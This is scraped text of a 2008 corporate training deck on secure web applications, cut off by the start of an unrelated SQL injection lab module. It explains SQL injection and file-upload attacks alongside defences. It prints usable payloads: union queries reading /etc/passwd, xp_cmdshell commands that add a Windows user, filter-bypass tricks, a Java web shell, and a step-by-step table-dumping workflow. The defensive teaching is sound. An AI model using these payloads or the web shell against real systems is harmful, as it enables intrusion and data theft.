Secure Web App. 제목 : Secure Web Application v1.0 ( 채수민책임 ) Copyright 2008 Samsung SDS Co., Ltd. All rights reserved - 1 -

Size: px

Start display at page:

Dana Bennett
6 years ago
Views:

4 Threat Investment % of Attacks % of Money As Network/Server Security improves, Attackers now Targeting Application core 75% 25% Web Applications Network Servers 10% 90% Maintain security Levels on Network/servers Next move to Strengthen Application layer 75% Of All Attacks on Information Security Are Directed to the Web Application Layer 2/3 Of All Web Application Are Vulnerable - Gartner - Copyright 2008 Samsung SDS Co., Ltd. All rights reserved - 4 -

13 How it Works SQL Injection Bypass the Authentication Already we Checked Get The Data Base DATA union all select 1,TNAME, 3 from tab-- Get The System File mysql : load_file() : union all select 1, 2,load_file( /etc/passwd )-- mssql : xp_dirtree, xp_regread Extended Procedure oracle : utl_file package Perform a System Command mssql : xp_cmdshell search= 1 ; exec master..xp_cmdshell dir c:\ if(db == mssql && user == sa) exec master..xp_cmdshell net user test test /add -- mysql : into outfile Copyright 2008 Samsung SDS Co., Ltd. All rights reserved

17 Best Practice SQL Injection Positive Input Check Check the type which is Number or Character! checktype( [a-za-z], request.getparameter( BOARD_ID )); public boolean checktype(string pattern, String value){ Pattern p = Pattern.compile(pattern); Matcher m = p.matcher(value); return m.matches(); } Negative Input Check --, %23, /*, (single quotation), select, union, chr, char, ETC - replaceall(request.getparameter( BOARD_ID ), select, s-e-l-e-c-t ); - if(param.indexof(badcharacter) > -1) return false; Copyright 2008 Samsung SDS Co., Ltd. All rights reserved

18 Best Practice SQL Injection Using PreparedStatement You should Bind the Variable whenever using PreparedStatement Statement stmt = null; ResultSet rs = null; String sql = null; PreparedStatement p = null; ResultSet rs = null; String sql = null; stmt = conn.createstatement(); sql = select id, name from user where id = + id + and pass= + pass + ; sql = select id, name from user where id =? and pass =? ; p = conn.preparestatement(sql); p.setobject(1, id); p.setobject(2, pass); rs = stmt.executequery(sql); rs = p.executequery(); while(){ Logic } While() { Logic } No Error Message, Remove unnecessary Procedure, DB Link, etc Copyright 2008 Samsung SDS Co., Ltd. All rights reserved

19 Warnings! SQL Injection filtering space is Secure? %09, %13 filtering single quotation is Secure? Numeric Type!! filtering All comment is Secure? if variable is located at the last position of SQL Query? filtering keyword(select, union, etc) is Secure? sele/**/ct, unio/**/n How about Encoding variable?? select chr(65) chr(66) from dual Copyright 2008 Samsung SDS Co., Ltd. All rights reserved

21 How it Works File Upload Directory Browsing && Read System(source) File Test.java (web shell) public static void main (String[] args){ Process process = Runtime.getRuntime().exec("cmd.exe /c +arg[0]); InputStream is = process.getinputstream(); BufferedReader br = new BufferedReader(new InputStreamReader(is)); String line = null; while ((line = br.readline())!= null) { System.out.println(line); } } [cmd] java Test dir Perform a System Command Of course, You can perform system commands, as well as directory browsing (if firewall has vulnerability) Get a Reverse Shell Let s check out the Real World. Copyright 2008 Samsung SDS Co., Ltd. All rights reserved

24 Best Practice File Upload Positive Input Check check the file type in the Server-Side Code (not in java-script) If(.xls.equals(filename.substring(filename.lastIndexOf(. )).doc.equals(filename.substring(filename.lastindexof(. ))){ ok }else{ throw new Exception(); } Change the user file Directory under(or different Volume of Disk) the Web Document Root Web Document Root : /home/docroot User File Directory : /home/fileroot You should make another Class for File Read. (in safety) Store the User Data in Database. if the Data is a resume, you must save it in Database Copyright 2008 Samsung SDS Co., Ltd. All rights reserved

25 Warnings! File Upload Negative File type Check is Not Secure. If(.jsp.equals(filename.substring(filename.lastIndexOf(. ))){ throw new Exception(); } It can be bypassed the check routine by js%70, jsp[space] How about upper case, lower case or mixed Change Directory is Secure?? (if directory traversal is worked) Hacker can change the Upload Directory. Prevent the directory traversal!! How about Check the file type? POST /upload.jsp HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms d936b2850a9c Content-Disposition: form-data; name="filename_0"; filename="c:\sec_visual.jpg" Content-Type: image/pjpeg Copyright 2008 Samsung SDS Co., Ltd. All rights reserved

28 Penetration Test SQL Injection URL has variable!! - Check Numeric or Not - Set DB Type - Success String Check Query We know the count of Column. So Make union Query Set with NULL Works? Change Data Type one by one Needs another Method Good job! You ve got the Query. Let s Get Tables! Check Injection - Check the URL has Vulnerable Try and Check Error or Not Use blind Injection Tools Sorry take a rest! How about order by 1 GET Tables - Get response form schema table with the query that you found. - parsing HTML and Get tables GET Columns - Get response form schema table with one of tables. - parsing HTML and Get columns How about order by n Good job! Let s check Query GET DATAS - Get response form a specific tables and columns - parsing HTML and Get datas Copyright 2008 Samsung SDS Co., Ltd. All rights reserved

Module 14: SQL Injection

Module 14: SQL Injection Objective The objective of this lab is to provide expert knowledge on SQL Injection attacks and other responsibilities that include: Understanding when and how web application